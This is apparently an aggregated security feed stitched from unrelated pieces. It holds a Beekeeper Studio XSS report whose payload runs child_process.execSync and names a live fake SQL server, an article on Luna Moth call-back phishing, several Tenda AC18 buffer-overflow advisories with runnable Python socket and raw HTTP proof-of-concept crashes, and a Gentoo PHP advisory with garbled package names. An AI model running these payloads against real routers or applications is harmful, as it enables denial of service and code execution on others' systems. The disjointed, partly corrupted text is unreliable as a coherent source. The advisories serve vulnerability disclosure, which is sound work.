A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.

**Author: bob11.devranger@gmail.com**

**Date: 2022-10-07**

**OS: Windows, Linux, MacOS**

**Beekeeper Studio Version: 3.6.6**

**DB Type&Version: MySQL 5.7 and 8.0 Also**

**Summary**

It has been possible to trigger remote code execution via Beekeeper’s **Modal Container**.

**Description**

Beekeeper has the modal container which indicates the user’s interaction is valid and due to a lack of sanitization of the modal contents, It has an XSS vulnerability like this:

_\[1\]_  
  

_\[2\]_  
  

The modal’s content also is transferred by MySQL packet when only the user’s interaction is invalid like this:  

So, Taking advantage of the report in CVE-2022-26174, it has been possible Remote Code Execution via Modal Container.

In this case, I made the fake MySQL server which spoofs user’s modal output when the user puts some data in a table.

This is my sample fake SQL server : poc.py

You can see this poc video that fake SQL server triggers RCE via Beekeeper.

PoC\_Video

In this video, I used this XSS script <input type="text" onfocus="require('child_process').execSync('calc.exe')" autofocus /> for modal error output and any input that user passes is replaced by that XSS script and re-passed to the user.

Finally, Malicious Code is triggered in the user’s PC and is continued until the modal is inactivated.

**What’s More?**

*   Not only data inserting functions but also any functions which use error modal(e.g. create table), It seems that we can trigger RCE too.

**Temporary Fake SQL Server**

146.56.129.188:3306

*   You can do these poc in this fake SQL server with Beekeeper
*   If you have any problems, contact me via **a42873410@gmail.com** or **bob11.devranger@gmail.com**
*   Thank You :)

CVE-2022-43143: BUG: Beekeeper Remote Code Execution via XSS · Issue #1393 · beekeeper-studio/beekeeper-studio

Luna Moth is relying solely on call-back phishing, as well as legitimate tools, to steal data and extract ransoms from victims of all stripes in an expanding cyberattack effort.

Researchers have spotted a threat actor that has managed to extort hundreds of thousands of dollars over the last few months from mostly small and midsize businesses — without using any encryption tools or malware.

Instead, the attacker — dubbed Luna Moth (aka the "Silent" ransomware group) has been using an array of legitimate tools and a technique dubbed "call-back phishing." The tactic is to steal sensitive data from victim organizations and use it as leverage to extort money from them.

**Targeted Attacks**

Most of the attacks so far have targeted smaller organizations in the legal industry; more recently, though, the adversary has begun going after larger companies in the retail sector as well, researchers from Palo Alto Network's Unit 42 said in a report Monday. The evolution of the attacks suggests the threat actor has become more efficient with its tactics and now presents a danger to businesses of all sizes, the security vendor warned.

"We are seeing this tactic successfully targeting all sizes of businesses — from large retailers to small/medium sized legal organization" says Kristopher Russo, senior threat researcher with Unit 42 at Palo Alto Networks. "Because social engineering targets individuals, the size of the company does not offer much protection."

Call-back phishing is a tactic that security researchers first observed the Conti ransomware group using more than a year ago in a campaign to install BazarLoader malware on victim systems.

**Call-Back Phishing**

The scam starts with an adversary sending a phishing email to a specific, targeted individual at a victim organization. The phishing email is custom made for the recipient, originates from a legitimate email service, and involves some kind of a lure to get the user to initiate a phone call with the attacker.

In the Luna Moth incidents that Unit 42 researchers observed, the phishing email contains an invoice — in the form of a PDF file — for a subscription service in the recipient's name. The attackers inform the victim the subscription will soon become active and get billed to the credit card number on file. The email provides a phone number to a purported call center — or sometimes multiple numbers — that users can call if they had questions about the invoice. Some of the invoices have logos of a well-known company on top of the page.

"This invoice even includes a unique tracking number used by the call center," Russo says. "So, when the victim calls the number to dispute the invoice, they look like a legitimate business."

The attackers then convince users who called to initiate a remote session with them using the Zoho Assist remote support tool. Once the victim is connected to the remote session, the attacker takes control of the victim's keyboard and mouse, enables access to the clipboard, and blanks out the user's screen, Unit 42 said.

After the attackers have accomplished that, their next step has been to install the legitimate Syncro remote support software for maintaining persistence on the victim's machine. They have also deployed other legit tools such as Rclone or WinSCP to steal data from it. Security tools rarely flag these products as suspicious because administrators have legitimate use cases for them in an environment.

In early attacks, the adversary installed multiple remote monitoring and management tools such as Atera and Splashtop on victim systems, but lately they appear to have whittled down their toolkit, Unit 42 said.

If a victim does not have administrative rights on their system, the attacker eschews any attempt to maintain persistence on it and instead goes straight to stealing data by leveraging WinSCP Portable.

"In cases where the attacker established persistence, exfiltration occurred hours to weeks after initial contact. Otherwise, the attacker only exfiltrated what they could during the call," Unit 42 said in its report.

**Applying the Most Pressure**

The Luna Moth group has typically gone after data that, when leveraged, will apply the most pressure to the victim, Russo says. In targeting legal firms, the attacker appeared to have a good knowledge of the industry, knowing the kind of data that would likely cause the most harm in the wrong hands.

"In the cases that Unit 42 investigated, they targeted sensitive and confidential data of the law firm's clients," Russo explains. "The attacker reviewed the data they stole and included a sample of the most damaging data they stole in the extortion email."

In many attacks, the adversary called out the victim's largest clients by name and threatened to contact them if the victim organization did not pay the demanded ransom — which typically has ranged from 2 to 78 Bitcoin.

In the cases Unit 42 has investigated, the attackers did not move laterally once they had gained access to a victim's machine. "However, they do continue to monitor the compromised computer if the victim has admin credentials — even going so far as to call and taunt the victims if they detect remediation efforts," Russo says.

Sygnia, one of the first to report on Luna Moth's activities, described the group as likely surfacing in March. The security vendor said it had observed the threat actor using commercially available remote access tools such as Atera, Splashtop, and Syncro, as well as AnyDesk for persistence. Sygnia said its researchers had also observed the threat actor using other legitimate tools such as SoftPerfect network scanner for reconnaissance and SharpShares for network enumeration. The attacker's tactic has been to store the tools on compromised systems with names that spoof legitimate binaries, Sygnia said.

"The threat actor in this campaign specifically seeks to minimize their digital footprint to evade most technical security control," Russo says.

Because they have been relying entirely on social engineering and legitimate tools in the campaign, the attacks leave very few artifacts, Unit 42 said. Thus, "we recommend that organizations of all sizes conduct security awareness training for employees" to protect against the new threat, Russo says.

Luna Moth's Novel, Malware-Free Extortion Campaign Takes Flight

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

Permalink

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In formSetMacFilterCfg function, deviceList is controllable and finally will be passed into the sub_C15F8 function.

In the sub_C15F8 function, it is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.0.1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: \*/\*
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Content\-Type: application/x\-www\-form\-urlencoded; charset\=UTF\-8
X\-Requested\-With: XMLHttpRequest
Content\-Length: 51
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/iptv.html?random\=0.7642888131213508&
Cookie: password\=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType\=1&deviceList\=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.05) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2610.html

**Affected version**

V15.03.05.05

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetDeviceName function, which can be accessed through the URL goform/SetDeviceName.

In formSetDeviceName function, devName is controllable and will be passed into the local_1c parameter. Then local_1c will be spliced into acStack412 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os
li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')
ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x300
p2 \= b'devName=' + p1
p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44174: IoT_vuln/Tenda_AC18_V15.03.05.05_Vuln_devName.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44183: IoT_vuln/Tenda/AC18/formSetWifiGuestBasic at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter.

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the addWifiMacFilter function, which can be accessed via the URL goform/addWifiMacFilter.

deviceId, deviceMac, are controllable and will be copied to nptr by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1
p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44180: IoT_vuln/Tenda/AC18/addWifiMacFilter at main · RobinWang825/IoT_vuln

Tenda AC15 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetIpMacBind.

CVE-2022-44156

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

CVE-2022-44163

Gentoo Linux Security Advisory 202211-3 - Multiple vulnerabilities have been found in PHP, the worst of which could result in arbitrary code execution. Versions less than 7.4.33:7.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal  
   Title: PHP: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #867913, #873376, #877853  
      ID: 202211-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in PHP, the worst of which  
could result in arbitrary code execution.

Background  
=========  
PHP is a widely-used general-purpose scripting language that is  
especially suited for Web development and can be embedded into HTML.

Affected packages  
================  
-------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/php      < 7.4.33:7.4             >= 7.4.33:7.4  
                                < 8.0.25:8.0             >= 8.0.25:8.0  
                                < 8.1.12:8.1               >= 8.1.12:8.1

Description  
==========  
Multiple vulnerabilities have been discovered in PHP. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All PHP 7.4 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-7.4.33"

All PHP 8.0 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.0.25"

All PHP 8.1 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.1.12"

References  
=========  
[ 1 ] CVE-2022-31628  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31628  
[ 2 ] CVE-2022-31629  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31629  
[ 3 ] CVE-2022-31630  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31630  
[ 4 ] CVE-2022-37454  
     https://nvd.nist.gov/vuln/detail/CVE-2022-37454

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac